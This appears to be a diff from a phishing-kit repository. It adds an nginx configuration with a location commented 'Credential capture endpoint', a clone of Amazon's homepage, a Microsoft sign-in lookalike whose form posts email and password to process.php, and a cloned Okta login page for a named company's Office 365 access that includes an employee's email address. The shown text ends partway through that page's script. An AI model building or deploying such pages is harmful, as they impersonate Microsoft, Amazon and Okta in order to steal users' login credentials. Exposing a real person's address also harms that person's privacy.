fastcgi_pass unix:/var/run/php/php7.4-fpm.sock;
|
||||
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
|
||||
}
|
||||
|
||||
# Credential capture endpoint
|
||||
location = /capture.php {
|
||||
limit_except POST { deny all; }
|
||||
include snippets/fastcgi-php.conf;
|
||||
fastcgi_pass unix:/var/run/php/php7.4-fpm.sock;
|
||||
}
|
||||
|
||||
# Template routing
|
||||
location /templates/ {
|
||||
try_files $uri $uri/ =404;
|
||||
}
|
||||
|
||||
# Static resources
|
||||
location /static/ {
|
||||
try_files $uri $uri/ =404;
|
||||
}
|
||||
|
||||
# Default
|
||||
location / {
|
||||
try_files $uri $uri/ /index.html;
|
||||
}
|
||||
}
|
||||
|
After Width: | Height: | Size: 83 KiB |
|
After Width: | Height: | Size: 37 KiB |
|
After Width: | Height: | Size: 43 KiB |
|
After Width: | Height: | Size: 46 KiB |
|
After Width: | Height: | Size: 10 KiB |
|
After Width: | Height: | Size: 25 KiB |
|
After Width: | Height: | Size: 9.0 KiB |
|
After Width: | Height: | Size: 11 KiB |
|
After Width: | Height: | Size: 31 KiB |
|
After Width: | Height: | Size: 34 KiB |
|
After Width: | Height: | Size: 40 KiB |
|
After Width: | Height: | Size: 22 KiB |
|
After Width: | Height: | Size: 38 KiB |
|
After Width: | Height: | Size: 122 KiB |
@@ -0,0 +1,238 @@
|
||||
<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<title>Amazon</title>
|
||||
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha512-iecdLmaskl7CVkqkXNQ/ZH/XLlvWZOJyj7Yy7tcenmpD1ypASozpmT/E0iPtmFIB46ZmdtAc9eNBvH0H/ZpiBw==" crossorigin="anonymous" referrerpolicy="no-referrer" />
|
||||
<link rel="stylesheet" href="style.css">
|
||||
</head>
|
||||
<body>
|
||||
<header>
|
||||
<div class="navbar">
|
||||
<div class="nav-logo border">
|
||||
<div class="logo"></div>
|
||||
</div>
|
||||
|
||||
<div class="nav-address border">
|
||||
<p class="add-first">Deliver to</p>
|
||||
<div class="add-icon">
|
||||
<i class="fa-solid fa-location-dot"></i>
|
||||
<p class="add-second">US</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="nav-search">
|
||||
<select class="search-select">
|
||||
<option>All</option>
|
||||
</select>
|
||||
<input placeholder="Search Amazon" class="search-input">
|
||||
<div class="search-icon">
|
||||
<i class="fa-solid fa-magnifying-glass"></i>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="nav-signin border">
|
||||
<p><span>Hello, sign in</span></p>
|
||||
<p class="nav-second">Accounts & Lists</p>
|
||||
</div>
|
||||
|
||||
<div class="nav-return border">
|
||||
<p><span>Returns</span></p>
|
||||
<p class="nav-second">& Orders</p>
|
||||
</div>
|
||||
|
||||
<div class="nav-cart border">
|
||||
<i class="fa-solid fa-cart-shopping"></i>
|
||||
Cart
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="panel">
|
||||
<div class="panel-all">
|
||||
<i class="fa-solid fa-bars"></i>
|
||||
All
|
||||
</div>
|
||||
|
||||
<div class="panel-options">
|
||||
<p>Today's Deals</p>
|
||||
<p>Buy Again</p>
|
||||
<p>Customer Service</p>
|
||||
<p>Registry</p>
|
||||
<p>Gift Cards</p>
|
||||
<p>Sell</p>
|
||||
</div>
|
||||
</div>
|
||||
</header>
|
||||
|
||||
<div class="hero-section">
|
||||
<div class="hero-msg">
|
||||
<p>You are on amazon.com. You can also shop on Amazon for millions of products with fast local delivery. <a>Click here to go to amazon.in</a></p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="shop-section">
|
||||
<div class="box">
|
||||
<div class="box-content">
|
||||
<h2>Clothes</h2>
|
||||
<div class="box-img" style="background-image: url('box1_image.jpg');"></div>
|
||||
<p>Shop now</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="box">
|
||||
<div class="box-content">
|
||||
<h2>Health & Personal Care</h2>
|
||||
<div class="box-img" style="background-image: url('box2_image.jpg');"></div>
|
||||
<p>Shop now</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="box">
|
||||
<div class="box-content">
|
||||
<h2>Furniture</h2>
|
||||
<div class="box-img" style="background-image: url('box3_image.jpg');"></div>
|
||||
<p>Shop now</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="box">
|
||||
<div class="box-content">
|
||||
<h2>Electronics</h2>
|
||||
<div class="box-img" style="background-image: url('box4_image.jpg');"></div>
|
||||
<p>See more</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="box">
|
||||
<div class="box-content">
|
||||
<h2>Beauty picks</h2>
|
||||
<div class="box-img" style="background-image: url('box5_image.jpg');"></div>
|
||||
<p>Shop now</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="box">
|
||||
<div class="box-content">
|
||||
<h2>Shop Pet Supplies</h2>
|
||||
<div class="box-img" style="background-image: url('box6_image.jpg');"></div>
|
||||
<p>See more</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="box">
|
||||
<div class="box-content">
|
||||
<h2>New Arrival in Toys</h2>
|
||||
<div class="box-img" style="background-image: url('box7_image.jpg');"></div>
|
||||
<p>Shop now</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="box">
|
||||
<div class="box-content">
|
||||
<h2>Discover Fashion Trends</h2>
|
||||
<div class="box-img" style="background-image: url('box8_image.jpg');"></div>
|
||||
<p>Shop now</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="box">
|
||||
<div class="box-content">
|
||||
<h2>Home refresh ideas</h2>
|
||||
<div class="box-img" style="background-image: url('box9_image.jpg');"></div>
|
||||
<p>Shop kitchen upgrades</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="box">
|
||||
<div class="box-content">
|
||||
<h2>Create with strip lights</h2>
|
||||
<div class="box-img" style="background-image: url('box10_image.jpg');"></div>
|
||||
<p>Shop now</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="box">
|
||||
<div class="box-content">
|
||||
<h2>For your Fitness Needs</h2>
|
||||
<div class="box-img" style="background-image: url('box11_image.jpg');"></div>
|
||||
<p>Shop now</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="box">
|
||||
<div class="box-content">
|
||||
<h2>Spring new arrivals</h2>
|
||||
<div class="box-img" style="background-image: url('box12_image.jpg');"></div>
|
||||
<p>Discover more</p>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<footer>
|
||||
<div class="foot-panel1">
|
||||
Back to Top
|
||||
</div>
|
||||
|
||||
<div class="foot-panel2">
|
||||
<ul>
|
||||
<p>Get to Know Us</p>
|
||||
<a>Careers</a>
|
||||
<a>Blog</a>
|
||||
<a>About Amazon</a>
|
||||
<a>Investor Relations</a>
|
||||
<a>Amazon Devices</a>
|
||||
<a>Amazon Science</a>
|
||||
</ul>
|
||||
|
||||
<ul>
|
||||
<p>Make Money with Us</p>
|
||||
<a>Sell products on Amazon</a>
|
||||
<a>Sell on Amazon Business</a>
|
||||
<a>Sell apps on Amazon</a>
|
||||
<a>Become an Affiliate</a>
|
||||
<a>Advertise Your Products</a>
|
||||
<a>Self-Publish with Us</a>
|
||||
<a>Host an Amazon Hub</a>
|
||||
<a>› See More Make Money with Us</a>
|
||||
</ul>
|
||||
|
||||
<ul>
|
||||
<p>Amazon Payment Products</p>
|
||||
<a>Amazon Business Card</a>
|
||||
<a>Shop with Points</a>
|
||||
<a>Reload Your Balance</a>
|
||||
<a>Amazon Currency Converter</a>
|
||||
</ul>
|
||||
|
||||
<ul>
|
||||
<p>Let Us Help You</p>
|
||||
<a>Amazon and COVID-19</a>
|
||||
<a>Your Account</a>
|
||||
<a>Your Orders</a>
|
||||
<a>Shipping Rates & Policies</a>
|
||||
<a>Returns & Replacements</a>
|
||||
<a>Manage Your Content and Devices</a>
|
||||
<a>Amazon Assistant</a>
|
||||
<a>Help</a>
|
||||
</ul>
|
||||
|
||||
</div>
|
||||
|
||||
<div class="foot-panel3">
|
||||
<div class="logo"></div>
|
||||
</div>
|
||||
|
||||
<div class="foot-panel4">
|
||||
<div class="policies">
|
||||
<a>Conditions of Use</a>
|
||||
<a>Privacy Policies</a>
|
||||
<a>Your Ads Privacy Choices</a>
|
||||
</div>
|
||||
<div class="copyright">
|
||||
© 1996-2023, Amazon.com, Inc. or its affiliates
|
||||
</div>
|
||||
</div>
|
||||
</footer>
|
||||
</body>
|
||||
</html>
|
||||
@@ -0,0 +1,269 @@
|
||||
* {
|
||||
margin: 0;
|
||||
font-family: Arial;
|
||||
border: border-box;
|
||||
}
|
||||
|
||||
.navbar {
|
||||
height: 60px;
|
||||
background-color: #0F1111;
|
||||
color: white;
|
||||
display: flex;
|
||||
align-items: center;
|
||||
justify-content: space-evenly;
|
||||
}
|
||||
|
||||
.nav-logo {
|
||||
height: 50px;
|
||||
width: 110px;
|
||||
}
|
||||
|
||||
.logo {
|
||||
background-image: url("amazon_logo.png");
|
||||
background-size: cover;
|
||||
height: 50px;
|
||||
width: 100%;
|
||||
}
|
||||
|
||||
.border {
|
||||
border: 1.5px solid transparent;
|
||||
}
|
||||
|
||||
.border:hover {
|
||||
border: 1.5px solid white;
|
||||
}
|
||||
|
||||
/* box2 */
|
||||
.add-first {
|
||||
color: #CCCCCC;
|
||||
font-size: 0.85rem;
|
||||
margin-left: 13px;
|
||||
}
|
||||
|
||||
.add-second {
|
||||
font-size: 1rem;
|
||||
margin-left: 1.5px;
|
||||
}
|
||||
|
||||
.add-icon {
|
||||
display: flex;
|
||||
align-items: center;
|
||||
}
|
||||
|
||||
/* box3 */
|
||||
.nav-search {
|
||||
display: flex;
|
||||
justify-content: space-evenly;
|
||||
background-color: pink;
|
||||
width: 600px;
|
||||
height: 40px;
|
||||
border-radius: 4px;
|
||||
}
|
||||
|
||||
.search-select {
|
||||
background-color: #f3f3f3;
|
||||
width: 50px;
|
||||
text-align: center;
|
||||
border-top-left-radius: 4px;
|
||||
border-bottom-left-radius: 4px;
|
||||
border: none;
|
||||
}
|
||||
|
||||
.search-input {
|
||||
width: 100%;
|
||||
font-size: 1rem;
|
||||
border: none;
|
||||
}
|
||||
|
||||
.search-icon {
|
||||
width: 45px;
|
||||
display: flex;
|
||||
justify-content: center;
|
||||
align-items: center;
|
||||
font-size: 1.2rem;
|
||||
background-color: #febd68;
|
||||
border-top-right-radius: 4px;
|
||||
border-bottom-right-radius: 4px;
|
||||
color: #0F1111;
|
||||
}
|
||||
|
||||
/* box4 */
|
||||
span {
|
||||
font-size: 0.7rem;
|
||||
}
|
||||
|
||||
.nav-second {
|
||||
font-size: 0.85rem;
|
||||
font-weight: 700;
|
||||
}
|
||||
|
||||
/* box6 */
|
||||
.nav-cart i {
|
||||
font-size: 28px;
|
||||
}
|
||||
|
||||
.nav-cart {
|
||||
font-size: 0.85rem;
|
||||
font-weight: 700;
|
||||
}
|
||||
|
||||
/* panel */
|
||||
.panel {
|
||||
height: 40px;
|
||||
background-color: #222f3d;
|
||||
display: flex;
|
||||
color: white;
|
||||
align-items: center;
|
||||
justify-content: space-evenly;
|
||||
}
|
||||
|
||||
.panel-all:hover {
|
||||
border: 1.5px solid white;
|
||||
}
|
||||
|
||||
.panel-options p {
|
||||
display: inline;
|
||||
margin-left: 10px;
|
||||
}
|
||||
|
||||
.panel-options {
|
||||
width: 85%;
|
||||
font-size: 0.85rem;
|
||||
}
|
||||
.panel-options p:hover {
|
||||
border: 1.5px solid white;
|
||||
}
|
||||
/* hero section */
|
||||
.hero-section {
|
||||
background-image: url("hero1_image.jpg");
|
||||
background-size: cover;
|
||||
height: 350px;
|
||||
display: flex;
|
||||
justify-content: center;
|
||||
align-items: flex-end;
|
||||
}
|
||||
|
||||
.hero-msg {
|
||||
background-color: white;
|
||||
color: black;
|
||||
height: 40px;
|
||||
display: flex;
|
||||
align-items: center;
|
||||
justify-content: center;
|
||||
font-size: 0.85rem;
|
||||
width: 80%;
|
||||
margin-bottom: 25px;
|
||||
}
|
||||
|
||||
.hero-msg a {
|
||||
color: #007185;
|
||||
}
|
||||
|
||||
/* shop-section */
|
||||
.shop-section {
|
||||
display: flex;
|
||||
flex-wrap: wrap;
|
||||
justify-content: space-evenly;
|
||||
background-color: hsl(318, 65%, 90%);
|
||||
}
|
||||
|
||||
|
||||
.box {
|
||||
/*border: 2px solid black;*/
|
||||
border-radius: 5px;
|
||||
height: 400px;
|
||||
width: 23%;
|
||||
background-color: white;
|
||||
padding: 20px 0px 15px;
|
||||
margin-top: 15px;
|
||||
}
|
||||
|
||||
.box-img {
|
||||
height: 300px;
|
||||
background-size: cover;
|
||||
margin-top: 1rem;
|
||||
margin-bottom: 1rem;
|
||||
}
|
||||
|
||||
.box-content {
|
||||
margin-left: 1rem;
|
||||
margin-right: 1rem;
|
||||
}
|
||||
|
||||
.box-content p {
|
||||
color: #007185;
|
||||
}
|
||||
|
||||
.box-content p:hover {
|
||||
color: #febd68;
|
||||
}
|
||||
/* footer */
|
||||
footer {
|
||||
margin-top: 15px;
|
||||
}
|
||||
|
||||
.foot-panel1 {
|
||||
background-color: #37475a;
|
||||
color: white;
|
||||
height: 50px;
|
||||
display: flex;
|
||||
justify-content: center;
|
||||
align-items: center;
|
||||
font-size: 0.85rem;
|
||||
}
|
||||
|
||||
.foot-panel2 {
|
||||
background-color: #222f3d;
|
||||
color: white;
|
||||
height: 500px;
|
||||
display: flex;
|
||||
justify-content: space-evenly;
|
||||
}
|
||||
|
||||
.foot-panel2 a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
ul {
|
||||
margin-top: 20px;
|
||||
}
|
||||
|
||||
ul a {
|
||||
display: block;
|
||||
font-size: 0.85rem;
|
||||
margin-top: 10px;
|
||||
color: #dddddd;
|
||||
}
|
||||
|
||||
.foot-panel3 {
|
||||
background-color: #222f3d;
|
||||
color: white;
|
||||
border-top: 0.5px solid white;
|
||||
height: 70px;
|
||||
display: flex;
|
||||
justify-content: center;
|
||||
align-items: center;
|
||||
}
|
||||
|
||||
.logo {
|
||||
background-image: url("amazon_logo.png");
|
||||
background-size: cover;
|
||||
height: 50px;
|
||||
width: 100px;
|
||||
}
|
||||
|
||||
.foot-panel4 {
|
||||
background-color: #0F1111;
|
||||
color: white;
|
||||
height: 80px;
|
||||
text-align: center;
|
||||
font-size: 0.7rem;
|
||||
}
|
||||
|
||||
.policies {
|
||||
padding-top: 25px;
|
||||
}
|
||||
|
||||
.copyright {
|
||||
padding-top: 5px;
|
||||
}
|
||||
@@ -0,0 +1,109 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Sign in to your account</title>
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1">
|
||||
<style>
|
||||
body {
|
||||
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
|
||||
background-image: url('../illustration');
|
||||
background-size: cover;
|
||||
background-position: center;
|
||||
background-repeat: no-repeat;
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
height: 100vh;
|
||||
display: flex;
|
||||
justify-content: center;
|
||||
align-items: center;
|
||||
}
|
||||
.login-container {
|
||||
background: white;
|
||||
width: 380px;
|
||||
padding: 30px 40px;
|
||||
box-shadow: 0 2px 6px rgba(0,0,0,0.1);
|
||||
}
|
||||
.logo {
|
||||
text-align: left;
|
||||
margin-bottom: 20px;
|
||||
}
|
||||
h1 {
|
||||
font-size: 24px;
|
||||
font-weight: 600;
|
||||
margin: 20px 0 15px;
|
||||
}
|
||||
input[type="text"], input[type="password"] {
|
||||
width: 100%;
|
||||
padding: 8px 0;
|
||||
margin-bottom: 15px;
|
||||
border: none;
|
||||
border-bottom: 1px solid #ccc;
|
||||
font-size: 15px;
|
||||
outline: none;
|
||||
}
|
||||
input:focus {
|
||||
border-bottom: 1px solid #0067b8;
|
||||
}
|
||||
.button-container {
|
||||
text-align: right;
|
||||
margin-top: 20px;
|
||||
}
|
||||
button {
|
||||
background-color: #0067b8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 8px 24px;
|
||||
font-size: 14px;
|
||||
cursor: pointer;
|
||||
}
|
||||
.links {
|
||||
margin-top: 20px;
|
||||
font-size: 13px;
|
||||
}
|
||||
.links a {
|
||||
color: #0067b8;
|
||||
text-decoration: none;
|
||||
}
|
||||
.footer {
|
||||
position: fixed;
|
||||
bottom: 0;
|
||||
width: 100%;
|
||||
display: flex;
|
||||
justify-content: space-between;
|
||||
padding: 10px 20px;
|
||||
font-size: 12px;
|
||||
color: #666;
|
||||
}
|
||||
.footer a {
|
||||
color: #666;
|
||||
text-decoration: none;
|
||||
margin-left: 20px;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div class="login-container">
|
||||
<div class="logo">
|
||||
<img src="https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31" alt="Microsoft" width="108">
|
||||
</div>
|
||||
<h1>Sign in</h1>
|
||||
<form action="process.php" method="post">
|
||||
<input type="text" name="email" placeholder="Email, phone, or Skype" required>
|
||||
<input type="password" name="password" placeholder="Password" required>
|
||||
<div class="links">
|
||||
<a href="https://signup.live.com/signup">No account? Create one!</a><br>
|
||||
<a href="https://account.live.com/password/reset">Can't access your account?</a>
|
||||
</div>
|
||||
<div class="button-container">
|
||||
<button type="submit">Next</button>
|
||||
</div>
|
||||
</form>
|
||||
</div>
|
||||
<div class="footer">
|
||||
<div class="terms">
|
||||
<a href="https://www.microsoft.com/en-us/servicesagreement/default.aspx">Terms of use</a>
|
||||
<a href="https://www.microsoft.com/en-us/privacy/privacystatement">Privacy & cookies</a>
|
||||
</div>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
||||
@@ -0,0 +1,558 @@
|
||||
<!DOCTYPE html>
|
||||
<!--[if IE 7]><html lang="en" class="lt-ie10 lt-ie9 lt-ie8"><![endif]-->
|
||||
<!--[if IE 8]><html lang="en" class="lt-ie10 lt-ie9"> <![endif]-->
|
||||
<!--[if IE 9]><html lang="en" class="lt-ie10"><![endif]-->
|
||||
<!--[if gt IE 9]><html lang="en"><![endif]-->
|
||||
<!--[if !IE]><!--><html lang="en"><!--<![endif]-->
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
|
||||
<script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">if (typeof module === 'object') {window.module = module; module = undefined;}</script><style type="text/css" nonce="GbJoEX60HpuEJf6f877zFg">
|
||||
.bgStyle {
|
||||
background-image: none
|
||||
}
|
||||
.bgStyleIE8 {
|
||||
|
||||
}
|
||||
.copyright a:focus-visible,
|
||||
.privacy-policy a:focus-visible {
|
||||
border-radius: 6px;
|
||||
outline: rgb(84, 107, 231) solid 1px;
|
||||
outline-offset: 2px;
|
||||
text-decoration: none !important;
|
||||
}
|
||||
</style><title>Zimperium - Sign In</title>
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
|
||||
<meta name="robots" content="noindex,nofollow" />
|
||||
|
||||
<script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">window.cspNonce = 'GbJoEX60HpuEJf6f877zFg';</script><script src="https://ok14static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.33.2/js/okta-sign-in.min.js" type="text/javascript" integrity="sha384-yEQR8oBedCVhw7cfWyk0wwOq6ewbnlhJsgb3G8QwTyJiYpTkYdfUsWK4QU4wjoen" crossorigin="anonymous"></script>
|
||||
<link href="https://ok14static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.33.2/css/okta-sign-in.min.css" type="text/css" rel="stylesheet" integrity="sha384-fxx+LDlIb08xQnHiuttLUvFQjDs5lrUHVoq4eWhpVlSteR2K2q21MbrOCkWfWqqs" crossorigin="anonymous"/>
|
||||
|
||||
<link rel="shortcut icon" href="https://ok14static.oktacdn.com/bc/image/fileStoreRecord?id=fs0po5khq8H3piuZ0697" type="image/x-icon"/>
|
||||
<link href="https://ok14static.oktacdn.com/assets/loginpage/css/loginpage-theme.c8c15f6857642c257bcd94823d968bb1.css" rel="stylesheet" type="text/css"/><link href="/api/internal/brand/theme/style-sheet?touch-point=SIGN_IN_PAGE&v=4baaffe7fc3b9ab0621cd0bb108e6974d398a61160fd4993137adea4c8d147355a9a62dc6d9c6a5560ecd7843236810e" rel="stylesheet" type="text/css">
|
||||
<style type="text/css">
|
||||
body {
|
||||
background-color: #ebebed !important;
|
||||
}
|
||||
.auth-container {
|
||||
background-color: #ffffff !important;
|
||||
}
|
||||
.o-form-button-bar .button-primary, .o-form-button-bar .button {
|
||||
background: #1b365d !important;
|
||||
border-color: #1b365d !important;
|
||||
}
|
||||
</style>
|
||||
<script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">
|
||||
var okta = {
|
||||
locale: 'en',
|
||||
deployEnv: 'PROD'
|
||||
};
|
||||
</script><script nonce="GbJoEX60HpuEJf6f877zFg">window.okta || (window.okta = {}); okta.cdnUrlHostname = "//ok14static.oktacdn.com"; okta.cdnPerformCheck = false;</script><script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">
|
||||
window.onerror = function (msg, _url, _lineNo, _colNo, error) {
|
||||
if (window.console && window.console.error) {
|
||||
if (error) {
|
||||
console.error(error);
|
||||
} else {
|
||||
console.error(msg);
|
||||
}
|
||||
}
|
||||
|
||||
// Return true to suppress "Script Error" alerts in IE
|
||||
return true;
|
||||
};
|
||||
</script><script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">if (window.module) module = window.module;</script></head>
|
||||
<body class="auth okta-container">
|
||||
|
||||
<!--[if gte IE 8]>
|
||||
<![if lte IE 10]>
|
||||
|
||||
<style type="text/css" nonce="GbJoEX60HpuEJf6f877zFg">
|
||||
.unsupported-browser-banner-wrap {
|
||||
padding: 20px;
|
||||
border: 1px solid #ddd;
|
||||
background-color: #f3fbff;
|
||||
}
|
||||
.unsupported-browser-banner-inner {
|
||||
position: relative;
|
||||
width: 735px;
|
||||
margin: 0 auto;
|
||||
text-align: left;
|
||||
}
|
||||
.unsupported-browser-banner-inner .icon {
|
||||
vertical-align: top;
|
||||
margin-right: 20px;
|
||||
display: inline-block;
|
||||
position: static !important;
|
||||
}
|
||||
.unsupported-browser-banner-inner a {
|
||||
text-decoration: underline;
|
||||
}
|
||||
</style><div class="unsupported-browser-banner-wrap">
|
||||
<div class="unsupported-browser-banner-inner">
|
||||
<span class="icon icon-16 icon-only warning-16-yellow"></span>You are using an unsupported browser. For the best experience, update to <a href="//help.okta.com/okta_help.htm?type=&locale=en&id=csh-browser-support">a supported browser</a>.</div>
|
||||
</div>
|
||||
|
||||
<![endif]>
|
||||
<![endif]-->
|
||||
<!--[if IE 8]> <div id="login-bg-image-ie8" class="login-bg-image tb--background bgStyleIE8" data-se="login-bg-image"></div> <![endif]-->
|
||||
<!--[if (gt IE 8)|!(IE)]><!--> <div id="login-bg-image" class="login-bg-image tb--background bgStyle" data-se="login-bg-image"></div> <!--<![endif]-->
|
||||
|
||||
<!-- hidden form for reposting fromURI for X509 auth -->
|
||||
<form action="/login/cert" method="post" id="x509_login" name="x509_login" class="hide">
|
||||
<input type="hidden" id="fromURI" name="fromURI" class="hidden" value="/app/office365/exk1ufbfxuFLJp6y3697/sso/wsfed/passive?username=Brian.Caldwell%40Zimperium.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx="/>
|
||||
</form>
|
||||
|
||||
<div class="content">
|
||||
<div class="applogin-banner">
|
||||
<div class="applogin-background"></div>
|
||||
<div class="applogin-container">
|
||||
<h1>
|
||||
<span class="applogin-app-title">
|
||||
Connecting to</span>
|
||||
<div class="applogin-app-logo">
|
||||
<img src="https://ok14static.oktacdn.com/fs/bcg/4/gfs1iitj6mtRHwXoE1d8" alt="Microsoft Office 365" class="logo office365"/></div>
|
||||
</h1>
|
||||
<p>Sign in with your account to access Microsoft Office 365</p>
|
||||
</div>
|
||||
</div>
|
||||
<style type="text/css" nonce="GbJoEX60HpuEJf6f877zFg">
|
||||
.noscript-msg {
|
||||
background-color: #fff;
|
||||
border-color: #ddd #ddd #d8d8d8;
|
||||
box-shadow:0 2px 0 rgba(175, 175, 175, 0.12);
|
||||
text-align: center;
|
||||
width: 398px;
|
||||
min-width: 300px;
|
||||
margin: 200px auto;
|
||||
border-radius: 3px;
|
||||
border-width: 1px;
|
||||
border-style: solid;
|
||||
}
|
||||
|
||||
.noscript-content {
|
||||
padding: 42px;
|
||||
}
|
||||
|
||||
.noscript-content h2 {
|
||||
padding-bottom: 20px;
|
||||
}
|
||||
|
||||
.noscript-content h1 {
|
||||
padding-bottom: 25px;
|
||||
}
|
||||
|
||||
.noscript-content a {
|
||||
background: transparent;
|
||||
box-shadow: none;
|
||||
display: table-cell;
|
||||
vertical-align: middle;
|
||||
width: 314px;
|
||||
height: 50px;
|
||||
line-height: 36px;
|
||||
color: #fff;
|
||||
background: linear-gradient(#007dc1, #0073b2), #007dc1;
|
||||
border: 1px solid;
|
||||
border-color: #004b75;
|
||||
border-bottom-color: #00456a;
|
||||
box-shadow: rgba(0, 0, 0, 0.15) 0 1px 0, rgba(255, 255, 255, 0.1) 0 1px 0 0 inset;
|
||||
-webkit-border-radius: 3px;
|
||||
border-radius: 3px;
|
||||
}
|
||||
|
||||
.noscript-content a:hover {
|
||||
background: #007dc1;
|
||||
cursor: hand;
|
||||
text-decoration: none;
|
||||
}
|
||||
</style><noscript>
|
||||
<div id="noscript-msg" class="noscript-msg">
|
||||
<div class="noscript-content">
|
||||
<h2>Javascript is required</h2>
|
||||
<h1>Javascript is disabled on your browser. Please enable Javascript and refresh this page.</h1>
|
||||
<a href="." class="tb--button">Refresh</a>
|
||||
</div>
|
||||
</div>
|
||||
</noscript>
|
||||
<div id="signin-container"></div>
|
||||
<div id="okta-sign-in" class="auth-container main-container hide">
|
||||
<div id="unsupported-onedrive" class="unsupported-message hide">
|
||||
<h2 class="o-form-head">Your OneDrive version is not supported</h2>
|
||||
<p>Upgrade now by installing the OneDrive for Business Next Generation Sync Client to login to Okta</p>
|
||||
<a class="button button-primary tb--button" target="_blank" href="https://support.okta.com/help/articles/Knowledge_Article/Upgrading-to-OneDrive-for-Business-Next-Generation-Sync-Client">
|
||||
Learn how to upgrade</a>
|
||||
</div>
|
||||
<div id="unsupported-cookie" class="unsupported-message hide">
|
||||
<h2 class="o-form-head">Cookies are required</h2>
|
||||
<p>Cookies are disabled on your browser. Please enable Cookies and refresh this page.</p>
|
||||
<a class="button button-primary tb--button" target="_blank" href=".">
|
||||
Refresh</a>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="footer">
|
||||
<div class="footer-container clearfix">
|
||||
<p class="copyright">Powered by <a href="https://www.okta.com/?internal_link=wic_login" class="inline-block notranslate">Okta</a></p>
|
||||
<p class="privacy-policy"><a href="/privacy" target="_blank" class="inline-block margin-l-10">Privacy Policy</a></p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<script nonce="GbJoEX60HpuEJf6f877zFg" type="text/javascript">function runLoginPage (fn) {var mainScript = document.createElement('script');mainScript.src = 'https://ok14static.oktacdn.com/assets/js/mvc/loginpage/initLoginPage.pack.58de3be0c9b511a0fdfd7ea4f69b56fc.js';mainScript.crossOrigin = 'anonymous';mainScript.integrity = 'sha384-cJ4LGViZBmIttMPH+ao2RyPuN5BztKWYWIa4smbm56r1cUhkU/Dr6vTS3UoPbKTI';document.getElementsByTagName('head')[0].appendChild(mainScript);fn && mainScript.addEventListener('load', function () { setTimeout(fn, 1) });}</script><script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">
|
||||
(function(){
|
||||
var baseUrl = 'https\x3A\x2F\x2Fzimperium.okta.com';
|
||||
var suppliedRedirectUri = '';
|
||||
var repost = false;
|
||||
var stateToken = '';
|
||||
var fromUri = '\x2Fapp\x2Foffice365\x2Fexk1ufbfxuFLJp6y3697\x2Fsso\x2Fwsfed\x2Fpassive\x3Fusername\x3DBrian.Caldwell\x2540Zimperium.com\x26wa\x3Dwsignin1.0\x26wtrealm\x3Durn\x253afederation\x253aMicrosoftOnline\x26wctx\x3D';
|
||||
var username = '';
|
||||
var rememberMe = true;
|
||||
var smsRecovery = false;
|
||||
var callRecovery = false;
|
||||
var emailRecovery = true;
|
||||
var usernameLabel = 'Username';
|
||||
var usernameInlineLabel = '';
|
||||
var passwordLabel = 'Password';
|
||||
var passwordInlineLabel = '';
|
||||
var signinLabel = 'Sign\x20In';
|
||||
var forgotpasswordLabel = 'Forgot\x20password\x3F';
|
||||
var unlockaccountLabel = 'Unlock\x20account\x3F';
|
||||
var helpLabel = 'Help';
|
||||
var orgSupportPhoneNumber = '';
|
||||
var hideSignOutForMFA = false;
|
||||
var hideBackToSignInForReset = false;
|
||||
var footerHelpTitle = 'Need\x20help\x20signing\x20in\x3F';
|
||||
var recoveryFlowPlaceholder = 'Email\x20or\x20Username';
|
||||
var signOutUrl = '';
|
||||
var authScheme = 'OAUTH2';
|
||||
var hasPasswordlessPolicy = '';
|
||||
var INVALID_TOKEN_ERROR_CODE = 'errors.E0000011';
|
||||
|
||||
var securityImage = true;
|
||||
|
||||
|
||||
|
||||
var selfServiceUnlock = false;
|
||||
|
||||
selfServiceUnlock = true;
|
||||
|
||||
|
||||
var redirectByFormSubmit = false;
|
||||
|
||||
|
||||
var showPasswordRequirementsAsHtmlList = true;
|
||||
|
||||
var autoPush = false;
|
||||
